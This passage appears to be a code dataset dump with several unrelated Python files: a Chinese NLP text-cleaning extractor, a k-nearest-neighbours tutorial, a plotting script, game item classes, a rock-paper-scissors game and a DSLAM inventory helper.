jionlp\n# author: dongrixinyu\n# license: Apache License 2.0\n# Email: dongrixinyu.89@163.com\n# github: https://github.com/dongrixinyu/JioNLP\n# description: Preprocessing tool for Chinese NLP\n\n\nimport os\nimport re\nimport pdb\n\nfrom .rule_pattern import *\n\n\n__all__ = ['Extractor']\n\n\nclass Extractor(object):\n \"\"\" 规则抽取器 \"\"\"\n def __init__(self):\n self.money_pattern = None\n self.email_pattern = None\n self.email_domain_pattern = None\n self.url_pattern = None\n self.phone_number_pattern = None\n self.ip_address_pattern = None\n self.id_card_pattern = None\n self.html_tag_pattern = None\n self.qq_pattern = None\n self.strict_qq_pattern = None\n self.cell_phone_pattern = None\n self.landline_phone_pattern = None\n self.extract_parentheses_pattern = None\n self.remove_parentheses_pattern = None\n self.parentheses_pattern = PARENTHESES_PATTERN\n self.parentheses_dict = None\n self.redundent_pattern = None\n self.exception_pattern = None\n self.full_angle_pattern = None\n self.chinese_char_pattern = None\n\n @staticmethod\n def _extract_base(pattern, text, with_offset=False):\n \"\"\" 正则抽取器的基础函数\n\n Args:\n text(str): 字符串文本\n with_offset(bool): 是否携带 offset (抽取内容字段在文本中的位置信息)\n\n Returns:\n list: 返回结果\n\n \"\"\"\n if with_offset:\n '''\n if pattern == self.strict_qq_pattern:\n for item in pattern.finditer(text):\n pdb.set_trace()\n pdb.set_trace()\n #'''\n results = [{'text': item.group(1), \n 'offset': (item.span()[0] - 1, item.span()[1] - 1)}\n for item in pattern.finditer(text)]\n else:\n results = [item.group(1) for item in pattern.finditer(text)]\n \n return results\n\n def remove_redundant_char(self, text):\n \"\"\"生成 redundant\n\n Args:\n # redundant_char: 冗余字符集\n text: 待处理文本\n\n Returns:\n 正则pattern\n\n \"\"\"\n if self.redundent_pattern is None:\n pattern_list = list()\n for char in REDUNDENT_PATTERN:\n pattern_tmp = '(?<={char}){char}+'.format(\n char=re.escape(char))\n pattern_list.append(pattern_tmp)\n \n redundent_pattern = '|'.join(pattern_list)\n self.redundent_pattern = re.compile(redundent_pattern)\n \n return self.redundent_pattern.sub('', text)\n\n def clean_text(self, text, remove_html_tag=True,\n convert_full2half=True,\n remove_exception_char=True, remove_url=True,\n remove_redundant_char=True, remove_parentheses=True,\n remove_email=True, remove_phone_number=True):\n \"\"\" 清洗文本\n\n Args:\n text(str): 待清理文本\n remove_html_tag(bool): 是否删除html标签,如 等\n remove_exception_char(bool): 是否删除异常字符,如“敩衞趑”等\n convert_full2half(bool): 是否将全角字符转换为半角\n remove_redundant_char(bool): 是否删除冗余字符,如“\\n\\n\\n”,修剪为“\\n”\n remove_parentheses(bool): 是否删除括号及括号内内容,如“(记者:小丽)”\n remove_url(bool): 是否删除 url 链接\n remove_email(bool): 是否删除 email\n remove_phone_number(bool): 是否删除电话号码\n\n Returns:\n str: 清理后的文本\n\n \"\"\"\n \n if remove_html_tag:\n text = self.remove_html_tag(text)\n if remove_exception_char:\n text = self.remove_exception_char(text)\n if convert_full2half:\n text = self.convert_full2half(text)\n if remove_redundant_char:\n text = self.remove_redundant_char(text)\n if remove_parentheses:\n text = self.remove_parentheses(text)\n if remove_url:\n text = self.remove_url(text)\n if remove_email:\n text = self.remove_email(text)\n if remove_phone_number:\n text = self.remove_phone_number(text)\n\n return text\n \n def convert_full2half(self, text):\n \"\"\" 将全角字符转换为半角字符\n 其中分为空格字符和非空格字符\n \"\"\"\n if self.full_angle_pattern is None:\n self.full_angle_pattern = re.compile(FULL_ANGLE_ALPHABET)\n \n final_text_list = list()\n cursor = 0\n for item in self.full_angle_pattern.finditer(text):\n # 补充前段字符串\n if item.span()[0] == 0:\n pass\n else:\n final_text_list.append(text[cursor: item.span()[0]])\n \n # 替换\n for char in item.group():\n if char == '\\u3000': # 全角空格直接替换\n final_text_list.append(' ')\n else:\n final_text_list.append(chr(ord(char) - 65248))\n cursor = item.span()[1] \n \n if len(text) > cursor: # 补充最后的字符串\n final_text_list.append(text[cursor:])\n \n return ''.join(final_text_list)\n \n def extract_email(self, text, detail=False):\n \"\"\" 提取文本中的 E-mail\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (E-mail 在文本中的位置信息)\n\n Returns:\n list: email列表\n\n \"\"\"\n if self.email_pattern is None:\n self.email_pattern = re.compile(EMAIL_PATTERN)\n \n text = ''.join(['#', text, '#'])\n results = self._extract_base(self.email_pattern, text, \n with_offset=detail)\n if not detail:\n return results\n else:\n if self.email_domain_pattern is None:\n self.email_domain_pattern = re.compile(EMAIL_DOMAIN_PATTERN)\n \n detail_results = list()\n for item in results:\n domain_name = self.email_domain_pattern.search(\n item['text']).group(1)\n item.update({'domain_name': domain_name})\n detail_results.append(item)\n return detail_results\n \n def extract_id_card(self, text, detail=False):\n \"\"\" 提取文本中的 ID 身份证号\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (身份证在文本中的位置信息)\n\n Returns:\n list: 身份证信息列表\n\n \"\"\"\n if self.id_card_pattern is None:\n self.id_card_pattern = re.compile(ID_CARD_PATTERN)\n\n text = ''.join(['#', text, '#'])\n return self._extract_base(self.id_card_pattern, text, \n with_offset=detail)\n \n def extract_ip_address(self, text, detail=False):\n \"\"\" 提取文本中的 IP 地址\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (IP 地址在文本中的位置信息)\n\n Returns:\n list: IP 地址列表\n\n \"\"\"\n if self.ip_address_pattern is None:\n self.ip_address_pattern = re.compile(IP_ADDRESS_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self._extract_base(self.ip_address_pattern, text, \n with_offset=detail)\n \n def extract_money(self, text):\n \"\"\"从文本中抽取出金额字符串,可以和 money_standardization 函数配合使用,\n 得到数字金额\n\n Args:\n text(str): 字符串文本\n\n Returns:\n list: email列表\n\n \"\"\"\n if self.money_pattern is None:\n self.money_pattern = re.compile(MONEY_PATTERN)\n \n res = list()\n for item in self.money_pattern.finditer(text):\n # print(item.group())\n res.append(item.group())\n \n return res\n \n def extract_phone_number(self, text, detail=False):\n \"\"\"从文本中抽取出电话号码\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (电话号码在文本中的位置信息)\n\n Returns:\n list: 电话号码列表\n\n \"\"\"\n if self.cell_phone_pattern is None:\n self.cell_phone_pattern = re.compile(CELL_PHONE_PATTERN)\n \n if self.landline_phone_pattern is None:\n self.landline_phone_pattern = re.compile(LANDLINE_PHONE_PATTERN)\n \n text = ''.join(['#', text, '#'])\n cell_results = self._extract_base(\n self.cell_phone_pattern, text, with_offset=detail)\n landline_results = self._extract_base(\n self.landline_phone_pattern, text, with_offset=detail)\n \n if not detail:\n return cell_results + landline_results\n else:\n detail_results = list()\n for item in cell_results:\n item.update({'type': 'cell_phone'})\n detail_results.append(item)\n for item in landline_results:\n item.update({'type': 'landline_phone'})\n detail_results.append(item)\n return detail_results\n \n def extract_qq(self, text, detail=False, strict=True):\n \"\"\"从文本中抽取出 QQ 号码\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (QQ 在文本中的位置信息)\n strict(bool): QQ号很容易和其他数字混淆,因此选择采用严格或宽松规则匹配\n\n Returns:\n list: email列表\n\n \"\"\"\n if self.qq_pattern is None:\n self.qq_pattern = re.compile(QQ_PATTERN)\n self.strict_qq_pattern = re.compile(STRICT_QQ_PATTERN)\n \n text = ''.join(['#', text, '#'])\n tmp_res = self._extract_base(\n self.qq_pattern, text, with_offset=detail)\n \n if not strict:\n return tmp_res\n else:\n # 将无法匹配 qq 字符的 qq 号删除\n match_flag = self.strict_qq_pattern.search(text)\n if match_flag:\n return tmp_res\n else:\n return list()\n \n def extract_url(self, text, detail=False):\n \"\"\"提取文本中的url链接\n\n Args:\n text(str): 字符串文本\n detail(bool): 是否携带 offset (URL 在文本中的位置信息)\n\n Returns:\n list: url列表\n\n \"\"\"\n if self.url_pattern is None:\n self.url_pattern = re.compile(URL_PATTERN)\n text = ''.join(['¥', text, '¥']) # 因 # 可出现于 url\n \n return self._extract_base(self.url_pattern, text, \n with_offset=detail)\n\n def _extract_parentheses(self, text, parentheses=PARENTHESES_PATTERN):\n # 额外分支 Ghs 提供的方法\n if self.extract_parentheses_pattern is None or self.parentheses_pattern != parentheses:\n import regex as reg\n self.parentheses_pattern = parentheses\n parentheses_per = zip(self.parentheses_pattern[:-1], self.parentheses_pattern[1:])\n self.extract_parentheses_pattern = f\"(?:{'|'.join('{left}([^{left}{right}]*){right}'.format(left=reg.escape(f), right=reg.escape(e)) for f, e in parentheses_per)})\"\n\n return [{'context': [j for j in i.groups() if j][0], 'offset': i.span(), 'origin': i.group()}\n for i in reg.compile(self.extract_parentheses_pattern).finditer(text)]\n\n def extract_parentheses(self, text, parentheses=PARENTHESES_PATTERN, detail=False):\n \"\"\" 提取文本中的括号及括号内内容,当有括号嵌套时,提取每一对\n 成对的括号的内容\n\n Args:\n text(str): 字符串文本\n parentheses: 要删除的括号类型,格式为:\n '左括号1右括号1左括号2右括号2...',必须为成对的括号如'{}()[]',\n 默认为self.parentheses\n detail: 是否打印括号内容位置信息\n\n Returns:\n list: [\n {\n 'context'(str): 'the context between parentheses',\n 'offset'(tuple): 'the location of extracted text'\n }, # 当 detail 为 True 时\n 'the context between parentheses', # 当 detail 为 False 时\n ...\n ]\n\n \"\"\"\n if self.extract_parentheses_pattern is None or self.parentheses_pattern != parentheses:\n self.parentheses_pattern = parentheses\n\n extract_pattern = '[' + re.escape(self.parentheses_pattern) + ']'\n extract_pattern = re.compile(extract_pattern)\n \n p_length = len(self.parentheses_pattern)\n\n parentheses_dict = dict()\n for i in range(0, p_length, 2):\n value = self.parentheses_pattern[i]\n key = self.parentheses_pattern[i + 1]\n parentheses_dict.update({key: value})\n \n self.parentheses_dict = parentheses_dict\n self.extract_parentheses_pattern = extract_pattern\n\n content_list = list()\n parentheses_list = list()\n idx_list = list()\n finditer = self.extract_parentheses_pattern.finditer(text)\n for i in finditer:\n idx = i.start()\n parentheses = text[idx]\n\n if parentheses in self.parentheses_dict.keys():\n if len(parentheses_list) > 0:\n if parentheses_list[-1] == self.parentheses_dict[parentheses]:\n parentheses_list.pop()\n if detail:\n start_idx = idx_list.pop()\n end_idx = idx + 1\n content_list.append(\n {'content': text[start_idx: end_idx],\n 'offset': (start_idx, end_idx)})\n else:\n content_list.append(text[idx_list.pop(): idx + 1])\n else:\n parentheses_list.append(parentheses)\n idx_list.append(idx)\n \n return content_list\n\n def remove_email(self, text):\n \"\"\" 删除文本中的 email\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除 email 后的文本\n\n \"\"\"\n if self.email_pattern is None:\n self.email_pattern = re.compile(EMAIL_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self.email_pattern.sub('', text)[1:-1]\n\n def remove_exception_char(self, text):\n \"\"\" 删除文本中的异常字符\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除异常字符后的文本\n \"\"\"\n if self.exception_pattern is None:\n self.exception_pattern = re.compile(EXCEPTION_PATTERN)\n \n return self.exception_pattern.sub(' ', text)\n\n def remove_html_tag(self, text):\n \"\"\" 删除文本中的 html 标签\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除 html 标签后的文本\n\n \"\"\"\n if self.html_tag_pattern is None:\n self.html_tag_pattern = re.compile(HTML_TAG_PATTERN)\n return re.sub(self.html_tag_pattern, '', text)\n \n def remove_id_card(self, text):\n \"\"\" 删除文本中的身份证号\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除身份证 id 后的文本\n\n \"\"\"\n if self.id_card_pattern is None:\n self.id_card_pattern = re.compile(ID_CARD_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self.id_card_pattern.sub('', text)[1:-1]\n \n def remove_ip_address(self, text):\n \"\"\" 删除文本中的 ip 地址\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除 ip 地址后的文本\n\n \"\"\"\n if self.ip_address_pattern is None:\n self.ip_address_pattern = re.compile(IP_ADDRESS_PATTERN)\n \n text = ''.join(['#', text, '#'])\n return self.ip_address_pattern.sub('', text)[1:-1]\n \n def remove_parentheses(self, text, parentheses=PARENTHESES_PATTERN):\n \"\"\" 删除文本中的括号及括号内内容\n\n Args:\n text(str): 字符串文本\n parentheses: 要删除的括号类型,格式为:\n '左括号1右括号1左括号2右括号2...',必须为成对的括号如'{}()[]',\n 默认为self.parentheses\n\n Returns:\n str: 删除括号及括号中内容后的文本\n\n \"\"\"\n if self.remove_parentheses_pattern is None or self.parentheses_pattern != parentheses:\n self.parentheses_pattern = parentheses\n\n p_length = len(self.parentheses_pattern)\n remove_pattern_list = list()\n remove_pattern_format = '{left}[^{left}{right}]*{right}'\n \n for i in range(0, p_length, 2):\n left = re.escape(self.parentheses_pattern[i])\n right = re.escape(self.parentheses_pattern[i + 1])\n remove_pattern_list.append(\n remove_pattern_format.format(left=left, right=right))\n \n remove_pattern = '|'.join(remove_pattern_list)\n remove_pattern = re.compile(remove_pattern)\n\n self.remove_parentheses_pattern = remove_pattern\n\n length = len(text)\n while True:\n text = self.remove_parentheses_pattern.sub('', text)\n if len(text) == length:\n return text\n length = len(text)\n\n def remove_phone_number(self, text):\n \"\"\" 删除文本中的电话号码\n\n Args:\n text(str): 字符串文本\n\n Returns:\n str: 删除电话号码后的文本\n\n \"\"\"\n if self.cell_phone_pattern is None:\n self.cell_phone_pattern = re.compile(CELL_PHONE_PATTERN)\n \n if self.landline_phone_pattern is None:\n self.landline_phone_pattern = re.compile(LANDLINE_PHONE_PATTERN)\n \n text = ''.join(['#', text, '#'])\n text = self.cell_phone_pattern.sub('', text)\n text = self.landline_phone_pattern.sub('', text)\n \n return text[1:-1]\n \n def remove_qq(self, text, strict=True):\n \"\"\" 删除文本中的电 QQ 号\n\n Args:\n text(str): 字符串文本\n strict(bool): QQ 号容易与其他数字混淆,因此选择严格规则或宽松规则\n\n Returns:\n str: 删除 QQ 后的文本\n\n \"\"\"\n if self.qq_pattern is None:\n self.qq_pattern = re.compile(QQ_PATTERN)\n self.strict_qq_pattern = re.compile(STRICT_QQ_PATTERN) \n\n if strict:\n # 将无法匹配 qq 字符的文本直接返回\n match_flag = self.strict_qq_pattern.search(text)\n if not match_flag:\n return text\n \n text = ''.join(['#', text, '#'])\n return self.qq_pattern.sub('', text)[1:-1]\n \n def remove_url(self, text):\n \"\"\" 删除文本中的 url 链接\n\n Args:\n text(str): 字符串文本\n\n Returns:\n text: 删除 url 链接后的文本\n\n \"\"\"\n if self.url_pattern is None:\n self.url_pattern = re.compile(URL_PATTERN)\n \n text = ''.join(['¥', text, '¥'])\n return self.url_pattern.sub('', text)[1:-1]\n\n def replace_chinese(self, text):\n \"\"\" 删除文本中的所有中文字符串\n\n 将中文文字,替换为空格\n\n \"\"\"\n if text == '':\n return []\n if self.chinese_char_pattern is None:\n self.chinese_char_pattern = re.compile(CHINESE_CHAR_PATTERN)\n \n text_without_chinese = self.chinese_char_pattern.sub(r' ', text)\n return text_without_chinese\n\n # {'phone': '18100065143', 'province': '上海', 'city': '上海',\n # 'zip_code': '200000', 'area_code': '021', 'phone_type': '电信'}\n\n def check_chinese_char(self, text):\n \"\"\" 检查文本中是否包含中文字符 \"\"\"\n if text == '':\n return False\n if self.chinese_char_pattern is None:\n self.chinese_char_pattern = re.compile(CHINESE_CHAR_PATTERN)\n\n if self.chinese_char_pattern.search(text):\n return True\n\n return False\n\n","sub_path":"jionlp/rule/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":21066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627746471","text":"import math\n\n'''\nThe following dataset is what we call the training dataset,\nbecause we will \"train\" our algorithm with it. The two \nnumbers are x and y coordinates, and the string is the class\nthat the datapoint at those coordinates belongs to.\nNotice the points closer to the origin are 'foos' and further\naway are 'bars'\n'''\ntraining_data = [[0,0,'foo'], [0,1,'foo'], [1,0,'foo'], [2,1,'foo'], [3,0,'foo'],\n[5,4,'bar'], [6,8,'bar'], [7,9,'bar'], [7,7,'bar'], [8,9,'bar']]\n\n#The following function clalculates the Euclidean Distanct between two sets of data.\n#In our case, the two sets of data are a pair of the x,y,class lists.\n#Note that your data structure could be many data points long, not just 2 like\n#in this example (x and y).\n\n#Note also that by using the range(len(data1)-1), we make sure to ignore the last\n#position in the data, which in our case is 'foo' or 'bar'\ndef euclidean_distance(xy1, xy2):\n\tc_squared = 0.0\n\tfor i in range(len(xy1)-1):\n\t\tc_squared += (float(xy1[i]) - float(xy2[i]))**2\n\t'''\n\tAnother way to write lines 23 and 24 is:\n\ta = xy1[0]-xy2[0]\n\tb = xy1[1]-xy2[1]\n\tc_squared = a**2 + b**2\n\t'''\n\treturn math.sqrt(c_squared)\n\n#The following function uses the distance function from above to calculate\n#each of the distances between the data point we want to classify and each\n#of the datasets we have in our training data. Basically, find the closest\n#points in the training_data to a new x,y coordinate.\n#Next, it sorts the results by the distances calculated (smallest first).\n#Finally, it trims the list to only k nearest neighbors\ndef get_neighbors(train_dataset, test_data, k):\n\tdists = []\n\tfor train_data in train_dataset:\n\t\tdist = euclidean_distance(test_data, train_data)\n\t\tdists.append((dist,train_data))\n\t\n\tdists.sort()\n\tneighbors = []\n\tfor i in range(k):\n\t\tneighbors.append(dists[i][1])\n\treturn neighbors\n\n#The following function uses the get_neighbors function from above, then\n#figures out which class has the most neighbors in it to predict the\n#most likely class that a new dataset belongs in. Basically, given the\n#closest neighbors to this new coordinate, how many are 'foo' and how\n#many are 'bar,' this new coordinate probably belongs to the majority.\ndef predict(train_dataset, test_data, k):\n\tneighbors = get_neighbors(train_dataset, test_data, k)\n\toutput_values = []\n\tcount_foo = 0\n\tcount_bar = 0\n\tfor n in neighbors:\n\t\tif n[-1] == 'foo':\n\t\t\tcount_foo += 1\n\t\telse:\n\t\t\tcount_bar += 1\n\tif count_foo > count_bar:\n\t\tprediction = 'foo'\n\telif count_foo < count_bar:\n\t\tprediction = 'bar'\n\telse:\n\t\tprediction = 'Could not classify'\n\treturn prediction\n\nprint(predict(training_data, [20,10], 3))\n\n","sub_path":"CS62/Session2/kneighbor.py","file_name":"kneighbor.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"355068478","text":"from mini_plot_tool import MiniPlotTool\nfrom csi_soap_test import *\n\nif __name__ == \"__main__\":\n baseConfig = {\n # 'figsize' : (6,8),\n # 'axis': [0,10,0,10],\n 'title' : 'query patient',\n 'ylabel' : 'time(s)',\n 'grid': True,\n 'xaxis_locator' : 2,\n #'yaxis_locator' : 0.1,\n # 'legend_loc' : 'upper right'\n }\n tool_query_patient = MiniPlotTool(baseConfig)\n\n csoap_test = CsiSoapTest(\"d:\\\\csi_use_csoap.log\")\n gsopa_test = CsiSoapTest(\"d:\\\\csi_use_gsoap.log\")\n\n X = [i for i in range(20)]\n Y1 = csoap_test.queryPatient()\n Y2 = gsopa_test.queryPatient()\n\n lineConf = {\n 'X': X,\n 'Y': Y1,\n # 'marker' : 'x',\n # 'color' : 'b',\n # 'markerfacecolor' : 'r',\n 'label' : 'use_csoap',\n # 'linewidth' : 3,\n # 'linestyle' : '--'\n }\n lineConf2 = {\n 'X': X,\n 'Y': Y2,\n 'marker': 'o',\n 'color': 'b',\n 'markerfacecolor': 'r',\n 'label': 'use_gsoap',\n 'linewidth': 3,\n 'linestyle': '--'\n }\n # tool.plotSingleLine(lineConf)\n tool_query_patient.addline(lineConf)\n tool_query_patient.addline(lineConf2)\n\n # print tool.removeline(1)\n tool_query_patient.plot()\n tool_query_patient.show()\n","sub_path":"csi_test/query_patient.py","file_name":"query_patient.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"597253155","text":"from .Weapons import Wand\r\n\r\nclass OakWand(Wand):\r\n def __init__(self, name=\"Oak Wand\", value=10, weight=0.5,\r\n strBuff=0, agiBuff=0, intBuff=5, damage=2, actionCost=3, scaleValue=1.0, tier=1):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 0, 2])\r\n self.setDamage(-1, 1)\r\n self.setWeight(-0.1, 0.2)\r\n\r\n\r\nclass BirchWand(Wand):\r\n def __init__(self, name=\"Birch Wand\", value=25, weight=0.6,\r\n strBuff=0, agiBuff=0, intBuff=7, damage=3, actionCost=3, scaleValue=1.3, tier=2):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 0, 3])\r\n self.setDamage(-2, 3)\r\n self.setWeight(-0.2, 0.3)\r\n\r\n\r\nclass DogwoodWand(Wand):\r\n def __init__(self, name=\"Dogwood Wand\", value=35, weight=0.7,\r\n strBuff=0, agiBuff=2, intBuff=6, damage=2, actionCost=2, scaleValue=1.9, tier=3):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 1, 3])\r\n self.setDamage(-1, 3)\r\n self.setWeight(-0.2, 0.3)\r\n\r\n\r\nclass HemlockWand(Wand):\r\n def __init__(self, name=\"Hemlock Wand\", value=45, weight=0.4,\r\n strBuff=0, agiBuff=10, intBuff=5, damage=5, actionCost=4, scaleValue=2.5, tier=4):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 5, 3])\r\n self.setDamage(-1, 3)\r\n self.setWeight(-0.1, 0.3)\r\n\r\n\r\nclass WalnutWand(Wand):\r\n def __init__(self, name=\"Walnut Wand\", value=55, weight=1.5,\r\n strBuff=0, agiBuff=3, intBuff=7, damage=7, actionCost=7, scaleValue=3.0, tier=5):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 1, 4])\r\n self.setDamage(-1, 4)\r\n self.setWeight(-0.1, 0.4)\r\n\r\n\r\nclass SycamoreWand(Wand):\r\n def __init__(self, name=\"Sycamore Wand\", value=65, weight=1.5,\r\n strBuff=2, agiBuff=5, intBuff=10, damage=9, actionCost=7, scaleValue=3.5, tier=6):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([0, 2, 7])\r\n self.setDamage(-1, 5)\r\n self.setWeight(-0.2, 0.3)\r\n\r\n\r\nclass ElderWand(Wand):\r\n def __init__(self, name=\"Elder Wand\", value=75, weight=1,\r\n strBuff=3, agiBuff=12, intBuff=15, damage=13, actionCost=10, scaleValue=4.0, tier=7):\r\n super().__init__(name, value, weight, strBuff, agiBuff, intBuff, damage, actionCost, scaleValue, tier)\r\n self.setStats([1, 10, 12])\r\n self.setDamage(-2, 5)\r\n self.setWeight(-0.5, 0.7)\r\n","sub_path":"Content/Items/Weapons/Wands.py","file_name":"Wands.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"391615177","text":"import random\r\n\r\n\r\ndef play_game():\r\n '''\r\n Game Rule:\r\n\r\n If a rock and scissors are formed, the rock wins, because a rock can smash scissors.\r\n If scissors and paper are formed, the scissors win, because scissors can cut paper.\r\n If paper and a rock are formed, the paper wins, because a sheet of paper can cover a rock. '''\r\n\r\n print('scissors (s) or paper (p) or rock (r) \\n')\r\n choices = ['s', 'p', 'r']\r\n\r\n try:\r\n while True:\r\n random_choice = random.choice(choices)\r\n user_input = str(input('Whats your choice?:'))\r\n\r\n if user_input == '' or user_input == ' ':\r\n print('Blank input... scissors (s) or paper (p) or rock (r) was expected ...\\n')\r\n\r\n elif user_input == 's' and random_choice == 'p':\r\n print('You Own!\\n')\r\n\r\n elif user_input == 'p' and random_choice == 'r':\r\n print('You Own!\\n')\r\n\r\n elif user_input == 'r' and random_choice == 's':\r\n print('You Own!\\n')\r\n\r\n elif user_input == 'p' and random_choice == 's':\r\n print('You Lost! \\n')\r\n\r\n elif user_input == 'r' and random_choice == 'p':\r\n print('You Lost! \\n')\r\n\r\n elif user_input == 's' and random_choice == 'r':\r\n print('You Lost! \\n')\r\n\r\n elif user_input == random_choice:\r\n print('Draw \\n')\r\n\r\n elif user_input != 's' or user_input != 'p' or user_input != 'r':\r\n print('scissors (s) or paper (p) or rock (r) was expected ...')\r\n\r\n print('Press \"Ctrl + c\" to exit .... \\n')\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n play_game()\r\n","sub_path":"Minor Projects/sicossrs paper rock.py","file_name":"sicossrs paper rock.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"174723581","text":"import csv\r\nimport os\r\n\r\ndef store_output(total_output, TIEMPO, dir_output):\r\n \"\"\"\r\n Guarda un string en Output/archivo.txt marcado segun del día\r\n\r\n total_output: Stirng con lo que se quiere agregar al archivo\r\n\r\n TIEMPO: Date del momento en que se ejecutó el script\r\n\r\n dir_output: \r\n \"\"\"\r\n if not (os.path.isdir(dir_output)):\r\n os.mkdir(dir_output)\r\n f = open(dir_output + \"/output_{0}.txt\".format(TIEMPO),\"a+\")\r\n for o in total_output:\r\n if isinstance(o,int):\r\n continue\r\n try:\r\n f.write(o)\r\n except:\r\n print(\"Error while writing line: \"+ str(o))\r\n f.close()\r\n\r\ndef crear_lista_DSLAMs(DSLAM_dir,test = False,manual = False):\r\n if test:\r\n Lista_DSLAMs = [{\"DSLAM_Modelo\": \"ISAM-FD\", \"DSLAM_Nombre\": \"MAQUETA\", \"DSLAM_IP\": \"192.168.121.33\"}]\r\n return Lista_DSLAMs\r\n elif manual:\r\n Lista_DSLAMs = [{\"DSLAM_Modelo\": \"ISAM-FD\",\"DSLAM_IP\":input(\"Ingresar IP de DSLAM:\")}]\r\n Lista_DSLAMs[0][\"DSLAM_Nombre\"]=Lista_DSLAMs[0][\"DSLAM_IP\"]\r\n return Lista_DSLAMs\r\n else:\r\n archivos = os.listdir(DSLAM_dir)\r\n if \"dslam.csv\" in archivos:\r\n dir = DSLAM_dir + \"/dslam.csv\"\r\n with open(dir, newline='') as csvfile:\r\n Lista_DSLAM = []\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n newrow = row[0].split(\",\")\r\n dict = {\"DSLAM_Modelo\":newrow[0],\"DSLAM_Nombre\":newrow[1],\"DSLAM_IP\":newrow[2]}\r\n Lista_DSLAM.append(dict)\r\n Lista_DSLAM.pop(0)\r\n return Lista_DSLAM\r\n\r\ndef crear_lista_Servicios(dir_inv, dslam, test=False, manual=False):\r\n if test:\r\n Lista_Servicios = [{\"port\":\"1/1/1/1\",\"DSLAM_Modelo\":\"ISAM-FD\", \"service\":\"PRUEBA\"}]\r\n return Lista_Servicios\r\n elif manual:\r\n Lista_Servicios = [{\"port\":input(\"Ingresar Puerto:\"),\"DSLAM_Modelo\":\"ISAM-FD\"}]\r\n Lista_Servicios[0][\"service\"] = Lista_Servicios[0][\"port\"]\r\n return Lista_Servicios\r\n else:\r\n archivos = os.listdir(dir_inv)\r\n if (dslam[\"DSLAM_Nombre\"]+\".csv\") in archivos:\r\n dir_servicios = dir_inv + \"/\" + dslam[\"DSLAM_Nombre\"]+\".csv\"\r\n with open(dir_servicios, newline='') as csvfile:\r\n Lista_Servicios = []\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n newrow = row[0].split(\",\")\r\n #DSLAM_Nombre,DSLAM_IP,port,type,user,service,admin-status\r\n dict = {\"DSLAM_Nombre\":newrow[0],\"DSLAM_IP\":newrow[1],\"port\":newrow[2],\"type\":newrow[3],\"user\":newrow[3],\"service\":newrow[4],\"admin-status\":newrow[5]}\r\n Lista_Servicios.append(dict)\r\n Lista_Servicios.pop(0)\r\n return Lista_Servicios\r\n\r\ndef Dict_to_CSV_DSLAM(Dict,name, TIEMPO,csv_columns):\r\n if not (os.path.isdir('Inventory/'+ TIEMPO)):\r\n os.mkdir(\"Inventory/\"+ TIEMPO)\r\n csv_file = \"Inventory/{0}/{1}.csv\".format(TIEMPO,name)\r\n try:\r\n with open(csv_file, 'w') as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\r\n writer.writeheader()\r\n for data in Dict:\r\n writer.writerow(data)\r\n except :\r\n print(\"I/O error\")\r\n return 3 #ERROR_READWRITE\r\n return 0 #OK\r\n\r\n#FUNCION delta_inventory\r\n#Objetivo:\r\n# Leer los titulos de todos los .csv de una carpeta y tenerlos en una lista\r\n# Comparar lo que hay en la lista anterior con el total de DSLAMs\r\n#Pseduo-Codigo\r\n#\r\n# Lista_Invetory = Leer_archivos_en_Carpeta(carpeta)\r\n# Lista_total_DSLAMs = crear_lista_DSLAMs(DSLAM_dir)\r\n#\r\n# Lista_de_diferencia = [ i for i in Lista_total_DSLAMs if i in Lista_Invetory]\r\n#\r\n# crear_csv(Lista_de_diferencia)\r\n\r\ndef delta_inventory(dir_inv, Lista_DSLAMs):\r\n if not os.path.isdir('Inventory'):\r\n os.mkdir(\"Inventory\")\r\n return []\r\n Carpetas_Inventory = os.listdir(dir_inv)\r\n\r\n Lista_Revisados = []\r\n for i in Carpetas_Inventory:\r\n list = os.listdir(dir_inv + \"/\" + i)\r\n Inventory = []\r\n for i in list:\r\n Inventory.append(i[:(len(i)-4)])\r\n Lista_Revisados.extend(Inventory)\r\n\r\n Lista_delta = [ i for i in Lista_DSLAMs if i[\"DSLAM_Nombre\"] not in Lista_Revisados]\r\n return 